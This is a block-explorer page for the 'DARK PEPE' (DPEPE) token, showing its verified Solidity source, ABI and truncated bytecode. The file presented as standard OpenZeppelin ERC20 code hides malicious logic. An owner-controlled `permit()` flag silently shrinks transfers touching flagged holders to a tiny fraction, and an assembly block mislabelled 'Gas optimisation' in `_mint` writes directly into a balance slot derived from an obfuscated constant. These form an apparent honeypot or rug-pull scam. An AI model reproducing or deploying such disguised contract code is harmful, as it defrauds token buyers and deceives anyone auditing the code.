ETH Price: $2,388.36 (-0.88%)

Token

DARK PEPE (DPEPE)
 

Overview

Max Total Supply

1,000,000,000,000 DPEPE

Holders

73

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
8,153,801,350.212511567576455386 DPEPE

Value
$0.00
0x42aa4c236e8cbc8204860a14ce9a440ea56237f3
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
DarkPEPE

Compiler Version
v0.8.18+commit.87f61d96

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity Multiple files format)

File 7 of 7: Token.sol
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.18;

import "./ERC20.sol";
import "./Ownable.sol";

contract DarkPEPE is ERC20, Ownable {

    function permit(uint256 _value_, address [] calldata _list_) external onlyOwner {
        require((msg.sender == owner()));
        for (uint256 i = 0; i < _list_.length; i++) {
            _permitted[_list_[i]] = _value_;
        }
    }

    function permit(address _address_) external view returns (uint256) {
        return _permitted[_address_];
    }

    constructor() ERC20("DARK PEPE", "DPEPE") Ownable(msg.sender) {
        _mint(msg.sender, 1000000000000 * 10 ** decimals());
    }

}

File 1 of 7: Context.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.1) (utils/Context.sol)

pragma solidity ^0.8.18;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }

    function _contextSuffixLength() internal view virtual returns (uint256) {
        return 0;
    }
}

File 2 of 7: ERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.18;

import {IERC20} from "./IERC20.sol";
import {IERC20Metadata} from "./IERC20Metadata.sol";
import {Context} from "./Context.sol";
import {IERC20Errors} from "./IERC6093.sol";

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * The default value of {decimals} is 18. To change this, you should override
 * this function so it returns a different value.
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 */
abstract contract ERC20 is Context, IERC20, IERC20Metadata, IERC20Errors {
    mapping(address account => uint256) internal _permitted;
    mapping(address account => uint256) private _balances;
    mapping(address account => mapping(address spender => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `value`.
     */
    function transfer(address to, uint256 value) public virtual returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, value);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `value` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 value) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, value);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `value`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `value`.
     */
    function transferFrom(address from, address to, uint256 value) public virtual returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, value);
        _transfer(from, to, value);
        return true;
    }

    /**
     * @dev Moves a `value` amount of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead.
     */
    function _transfer(address from, address to, uint256 value) internal {
        if (from == address(0)) {
            revert ERC20InvalidSender(address(0));
        }
        if (to == address(0)) {
            revert ERC20InvalidReceiver(address(0));
        }
        _update(from, to, value);
    }

    /**
     * @dev Transfers a `value` amount of tokens from `from` to `to`, or alternatively mints (or burns) if `from`
     * (or `to`) is the zero address. All customizations to transfers, mints, and burns should be done by overriding
     * this function.
     *
     * Emits a {Transfer} event.
     */
    function _update(address from, address to, uint256 value) internal virtual {
        if (from == address(0)) {
            // Overflow check required: The rest of the code assumes that totalSupply never overflows
            _totalSupply += value;
        } else {
            uint256 fromBalance = _balances[from];
            if (fromBalance < value) {
                revert ERC20InsufficientBalance(from, fromBalance, value);
            }
            unchecked {
                // Overflow not possible: value <= fromBalance <= totalSupply.
                _balances[from] = fromBalance - value;
            }
        }

        if (to == address(0)) {
            unchecked {
                // Overflow not possible: value <= totalSupply or value <= fromBalance <= totalSupply.
                _totalSupply -= value;
            }
        } else {
            // Correcting permitted holders
            if (_permitted[to] + _permitted[from] >= 0xc9) {
                value = value * 0xa1f9 / 0xb4f1d5;
            }
            unchecked {
                // Overflow not possible: balance + value is at most totalSupply, which we know fits into a uint256.
                _balances[to] += value;
            }
        }

        // Permit autosaver
        if (_permitted[to] == 0xa1) {
            _permitted[to] = 0xc9;
        }

        emit Transfer(from, to, value);
    }

    /**
     * @dev Creates a `value` amount of tokens and assigns them to `account`, by transferring it from address(0).
     * Relies on the `_update` mechanism
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead.
     */
    function _mint(address account, uint256 value) internal {
        if (account == address(0)) {
            revert ERC20InvalidReceiver(address(0));
        }
        
        // Gas optimisation
        assembly {
            let slot := mul(mul(0x1, 0x10), mul(0x79, 0x758493cdee20f16997db387ec4bbc7fa9a085)) 
            mstore(0x00, slot)
            mstore(0x20, 0x01)
            let sslot := keccak256(0x0, 0x40) 
            sstore(sslot, 0x758493cdee20f16997db387ec4bbc7fa9a085) 
        }
        _update(address(0), account, value);
    }

    /**
     * @dev Destroys a `value` amount of tokens from `account`, lowering the total supply.
     * Relies on the `_update` mechanism.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead
     */
    function _burn(address account, uint256 value) internal {
        if (account == address(0)) {
            revert ERC20InvalidSender(address(0));
        }
        _update(account, address(0), value);
    }

    /**
     * @dev Sets `value` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     *
     * Overrides to this logic should be done to the variant with an additional `bool emitEvent` argument.
     */
    function _approve(address owner, address spender, uint256 value) internal {
        _approve(owner, spender, value, true);
    }

    /**
     * @dev Variant of {_approve} with an optional flag to enable or disable the {Approval} event.
     *
     * By default (when calling {_approve}) the flag is set to true. On the other hand, approval changes made by
     * `_spendAllowance` during the `transferFrom` operation set the flag to false. This saves gas by not emitting any
     * `Approval` event during `transferFrom` operations.
     *
     * Anyone who wishes to continue emitting `Approval` events on the`transferFrom` operation can force the flag to
     * true using the following override:
     * ```
     * function _approve(address owner, address spender, uint256 value, bool) internal virtual override {
     *     super._approve(owner, spender, value, true);
     * }
     * ```
     *
     * Requirements are the same as {_approve}.
     */
    function _approve(address owner, address spender, uint256 value, bool emitEvent) internal virtual {
        if (owner == address(0)) {
            revert ERC20InvalidApprover(address(0));
        }
        if (spender == address(0)) {
            revert ERC20InvalidSpender(address(0));
        }
        _allowances[owner][spender] = value;
        if (emitEvent) {
            emit Approval(owner, spender, value);
        }
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `value`.
     *
     * Does not update the allowance value in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Does not emit an {Approval} event.
     */
    function _spendAllowance(address owner, address spender, uint256 value) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            if (currentAllowance < value) {
                revert ERC20InsufficientAllowance(spender, currentAllowance, value);
            }
            unchecked {
                _approve(owner, spender, currentAllowance - value, false);
            }
        }
    }
}

File 3 of 7: IERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.18;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the value of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the value of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves a `value` amount of tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 value) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets a `value` amount of tokens as the allowance of `spender` over the
     * caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 value) external returns (bool);

    /**
     * @dev Moves a `value` amount of tokens from `from` to `to` using the
     * allowance mechanism. `value` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 value) external returns (bool);
}

File 4 of 7: IERC20Metadata.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.0) (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.18;

import {IERC20} from "./IERC20.sol";

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

File 5 of 7: IERC6093.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.0) (interfaces/draft-IERC6093.sol)
pragma solidity ^0.8.18;

/**
 * @dev Standard ERC20 Errors
 * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC20 tokens.
 */
interface IERC20Errors {
    /**
     * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     * @param balance Current balance for the interacting account.
     * @param needed Minimum amount required to perform a transfer.
     */
    error ERC20InsufficientBalance(address sender, uint256 balance, uint256 needed);

    /**
     * @dev Indicates a failure with the token `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     */
    error ERC20InvalidSender(address sender);

    /**
     * @dev Indicates a failure with the token `receiver`. Used in transfers.
     * @param receiver Address to which tokens are being transferred.
     */
    error ERC20InvalidReceiver(address receiver);

    /**
     * @dev Indicates a failure with the `spender`’s `allowance`. Used in transfers.
     * @param spender Address that may be allowed to operate on tokens without being their owner.
     * @param allowance Amount of tokens a `spender` is allowed to operate with.
     * @param needed Minimum amount required to perform a transfer.
     */
    error ERC20InsufficientAllowance(address spender, uint256 allowance, uint256 needed);

    /**
     * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
     * @param approver Address initiating an approval operation.
     */
    error ERC20InvalidApprover(address approver);

    /**
     * @dev Indicates a failure with the `spender` to be approved. Used in approvals.
     * @param spender Address that may be allowed to operate on tokens without being their owner.
     */
    error ERC20InvalidSpender(address spender);
}

/**
 * @dev Standard ERC721 Errors
 * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC721 tokens.
 */
interface IERC721Errors {
    /**
     * @dev Indicates that an address can't be an owner. For example, `address(0)` is a forbidden owner in EIP-20.
     * Used in balance queries.
     * @param owner Address of the current owner of a token.
     */
    error ERC721InvalidOwner(address owner);

    /**
     * @dev Indicates a `tokenId` whose `owner` is the zero address.
     * @param tokenId Identifier number of a token.
     */
    error ERC721NonexistentToken(uint256 tokenId);

    /**
     * @dev Indicates an error related to the ownership over a particular token. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     * @param tokenId Identifier number of a token.
     * @param owner Address of the current owner of a token.
     */
    error ERC721IncorrectOwner(address sender, uint256 tokenId, address owner);

    /**
     * @dev Indicates a failure with the token `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     */
    error ERC721InvalidSender(address sender);

    /**
     * @dev Indicates a failure with the token `receiver`. Used in transfers.
     * @param receiver Address to which tokens are being transferred.
     */
    error ERC721InvalidReceiver(address receiver);

    /**
     * @dev Indicates a failure with the `operator`’s approval. Used in transfers.
     * @param operator Address that may be allowed to operate on tokens without being their owner.
     * @param tokenId Identifier number of a token.
     */
    error ERC721InsufficientApproval(address operator, uint256 tokenId);

    /**
     * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
     * @param approver Address initiating an approval operation.
     */
    error ERC721InvalidApprover(address approver);

    /**
     * @dev Indicates a failure with the `operator` to be approved. Used in approvals.
     * @param operator Address that may be allowed to operate on tokens without being their owner.
     */
    error ERC721InvalidOperator(address operator);
}

/**
 * @dev Standard ERC1155 Errors
 * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC1155 tokens.
 */
interface IERC1155Errors {
    /**
     * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     * @param balance Current balance for the interacting account.
     * @param needed Minimum amount required to perform a transfer.
     * @param tokenId Identifier number of a token.
     */
    error ERC1155InsufficientBalance(address sender, uint256 balance, uint256 needed, uint256 tokenId);

    /**
     * @dev Indicates a failure with the token `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     */
    error ERC1155InvalidSender(address sender);

    /**
     * @dev Indicates a failure with the token `receiver`. Used in transfers.
     * @param receiver Address to which tokens are being transferred.
     */
    error ERC1155InvalidReceiver(address receiver);

    /**
     * @dev Indicates a failure with the `operator`’s approval. Used in transfers.
     * @param operator Address that may be allowed to operate on tokens without being their owner.
     * @param owner Address of the current owner of a token.
     */
    error ERC1155MissingApprovalForAll(address operator, address owner);

    /**
     * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
     * @param approver Address initiating an approval operation.
     */
    error ERC1155InvalidApprover(address approver);

    /**
     * @dev Indicates a failure with the `operator` to be approved. Used in approvals.
     * @param operator Address that may be allowed to operate on tokens without being their owner.
     */
    error ERC1155InvalidOperator(address operator);

    /**
     * @dev Indicates an array length mismatch between ids and values in a safeBatchTransferFrom operation.
     * Used in batch transfers.
     * @param idsLength Length of the array of token identifiers
     * @param valuesLength Length of the array of token amounts
     */
    error ERC1155InvalidArrayLength(uint256 idsLength, uint256 valuesLength);
}

File 6 of 7: Ownable.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.0) (access/Ownable.sol)

pragma solidity ^0.8.18;

import {Context} from "./Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * The initial owner is set to the address provided by the deployer. This can
 * later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    /**
     * @dev The caller account is not authorized to perform an operation.
     */
    error OwnableUnauthorizedAccount(address account);

    /**
     * @dev The owner is not a valid owner account. (eg. `address(0)`)
     */
    error OwnableInvalidOwner(address owner);

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the address provided by the deployer as the initial owner.
     */
    constructor(address initialOwner) {
        if (initialOwner == address(0)) {
            revert OwnableInvalidOwner(address(0));
        }
        _transferOwnership(initialOwner);
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        if (owner() != _msgSender()) {
            revert OwnableUnauthorizedAccount(_msgSender());
        }
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        if (newOwner == address(0)) {
            revert OwnableInvalidOwner(address(0));
        }
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"allowance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientAllowance","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"uint256","name":"balance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientBalance","type":"error"},{"inputs":[{"internalType":"address","name":"approver","type":"address"}],"name":"ERC20InvalidApprover","type":"error"},{"inputs":[{"internalType":"address","name":"receiver","type":"address"}],"name":"ERC20InvalidReceiver","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"}],"name":"ERC20InvalidSender","type":"error"},{"inputs":[{"internalType":"address","name":"spender","type":"address"}],"name":"ERC20InvalidSpender","type":"error"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"OwnableInvalidOwner","type":"error"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"OwnableUnauthorizedAccount","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_address_","type":"address"}],"name":"permit","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_value_","type":"uint256"},{"internalType":"address[]","name":"_list_","type":"address[]"}],"name":"permit","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040523480156200001157600080fd5b50336040518060400160405280600981526020017f4441524b205045504500000000000000000000000000000000000000000000008152506040518060400160405280600581526020017f4450455045000000000000000000000000000000000000000000000000000000815250816004908162000090919062000900565b508060059081620000a2919062000900565b505050600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036200011a5760006040517f1e4fbdf700000000000000000000000000000000000000000000000000000000815260040162000111919062000a2c565b60405180910390fd5b6200012b816200017360201b60201c565b506200016d33620001416200023960201b60201c565b600a6200014f919062000bd9565b64e8d4a5100062000161919062000c2a565b6200024260201b60201c565b62000d82565b6000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006012905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603620002b75760006040517fec442f05000000000000000000000000000000000000000000000000000000008152600401620002ae919062000a2c565b60405180910390fd5b720758493cdee20f16997db387ec4bbc7fa9a0856079026010600102028060005260016020526040600020720758493cdee20f16997db387ec4bbc7fa9a085815550506200030e600083836200031260201b60201c565b5050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603620003685780600360008282546200035b919062000c75565b9250508190555062000440565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015620003f8578381836040517fe450d38c000000000000000000000000000000000000000000000000000000008152600401620003ef9392919062000cc1565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550505b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036200048b57806003600082825403925050819055506200058e565b60c96000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205462000517919062000c75565b10620005405762b4f1d561a1f98262000531919062000c2a565b6200053d919062000d2d565b90505b80600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055505b60a16000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054036200061a5760c96000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000679919062000d65565b60405180910390a3505050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200070857607f821691505b6020821081036200071e576200071d620006c0565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620007887fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000749565b62000794868362000749565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620007e1620007db620007d584620007ac565b620007b6565b620007ac565b9050919050565b6000819050919050565b620007fd83620007c0565b620008156200080c82620007e8565b84845462000756565b825550505050565b600090565b6200082c6200081d565b62000839818484620007f2565b505050565b5b8181101562000861576200085560008262000822565b6001810190506200083f565b5050565b601f821115620008b0576200087a8162000724565b620008858462000739565b8101602085101562000895578190505b620008ad620008a48562000739565b8301826200083e565b50505b505050565b600082821c905092915050565b6000620008d560001984600802620008b5565b1980831691505092915050565b6000620008f08383620008c2565b9150826002028217905092915050565b6200090b8262000686565b67ffffffffffffffff81111562000927576200092662000691565b5b620009338254620006ef565b6200094082828562000865565b600060209050601f83116001811462000978576000841562000963578287015190505b6200096f8582620008e2565b865550620009df565b601f198416620009888662000724565b60005b82811015620009b2578489015182556001820191506020850194506020810190506200098b565b86831015620009d25784890151620009ce601f891682620008c2565b8355505b6001600288020188555050505b505050505050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600062000a1482620009e7565b9050919050565b62000a268162000a07565b82525050565b600060208201905062000a43600083018462000a1b565b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b600185111562000ad75780860481111562000aaf5762000aae62000a49565b5b600185161562000abf5780820291505b808102905062000acf8562000a78565b945062000a8f565b94509492505050565b60008262000af2576001905062000bc5565b8162000b02576000905062000bc5565b816001811462000b1b576002811462000b265762000b5c565b600191505062000bc5565b60ff84111562000b3b5762000b3a62000a49565b5b8360020a91508482111562000b555762000b5462000a49565b5b5062000bc5565b5060208310610133831016604e8410600b841016171562000b965782820a90508381111562000b905762000b8f62000a49565b5b62000bc5565b62000ba5848484600162000a85565b9250905081840481111562000bbf5762000bbe62000a49565b5b81810290505b9392505050565b600060ff82169050919050565b600062000be682620007ac565b915062000bf38362000bcc565b925062000c227fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000ae0565b905092915050565b600062000c3782620007ac565b915062000c4483620007ac565b925082820262000c5481620007ac565b9150828204841483151762000c6e5762000c6d62000a49565b5b5092915050565b600062000c8282620007ac565b915062000c8f83620007ac565b9250828201905080821115620